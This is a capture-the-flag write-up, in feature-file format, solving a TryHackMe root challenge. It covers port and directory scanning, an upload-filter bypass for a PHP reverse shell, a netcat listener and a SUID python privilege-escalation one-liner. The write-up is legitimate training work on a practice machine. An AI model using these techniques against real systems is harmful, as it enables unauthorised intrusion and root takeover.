## Version 2.0
## language: en
Feature: starters-www.tryhackme.com
  Site:
    www.tryhackme.com
  User:
    juan6630
  Goal:
    Retrieve the root password.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | kali-linux      | 2020.4      |
    | Mozilla Firefox | 85.0.2      |
    | Nmap            | 7.80        |
    | Dirsearch       | 0.4.1       |
  Machine information:
    Given I start the challenge with the following IP address
    """
    10.10.129.135
    """
    When I access the machine via VPN
    Then I see the welcome page from the challenge
    """
    root@rootme:~#
    Can you root me?
    """

  Scenario: Fail: PERL reverse shell
    Given I have access to the challenge's IP address
    When I scan the IP with nmap
    """
    $ nmap -A -T4 -p- 10.10.129.135
    PORT  STATE SERVICE VERSION
    22/tcp  open  ssh OpenSSH 7.6p1 Ubuntu
    80/tcp  open  http  Apache httpd 2.4.29
    """
    Then I check the website on port 80
    But I don't find anything interesting
    When I use dirsearch for extra information from the website
    """
    python3 dirsearch.py -u 10.10.129.135 -e php
    """
    Then I obtain the following directories
    """
    [06:38:15] 200 -  732B - /panel/
    [06:38:31] 200 -  744B - /uploads/
    """
    And I open the panel site [evidence](panel.png)
    When I search for reverse shell
    And I use the pentestmonkey cheat sheet
    """
    http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    """
    Then I try to use the php-reverse-shell
    But I get an error [evidence](invalidphp.png)
    When I try to use the perl-reverse-shell
    And I setup the listener with
    """
    nc -nvlp 4422
    """
    Then I can load the file on the website
    But The directory don't execute perl

  Scenario: Success: PHP reverse shell
    Given I have access to the challenge's IP address
    When I search for 'bypass file restriction reverse shell'
    Then I modify the php extension to <<php6>> following the exploit-db guide
    """
    https://www.exploit-db.com/docs/english/45074-file-upload-
    restrictions-bypass.pdf
    """
    And I successfully upload the file [evidence](phpshell.png)
    When I add the name of the file to the URL
    Then I get a reverse shell
    And I get one of the flags [evidence](user.png)

  Scenario: Success: Privilege escalation
    Given I have a shell with no user
    When I search for files with SUID permission with
    """
    find / -usr root -perm /4000
    """
    Then I obtain
    """
    /usr/bin/python
    """
    And I search for python privilege escalation
    """
    https://gtfobins.github.io/gtfobins/python/
    """
    When I use
    """
    /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
    """
    Then I get a shell as root [evidence](root.png)
    And I solve the challenge
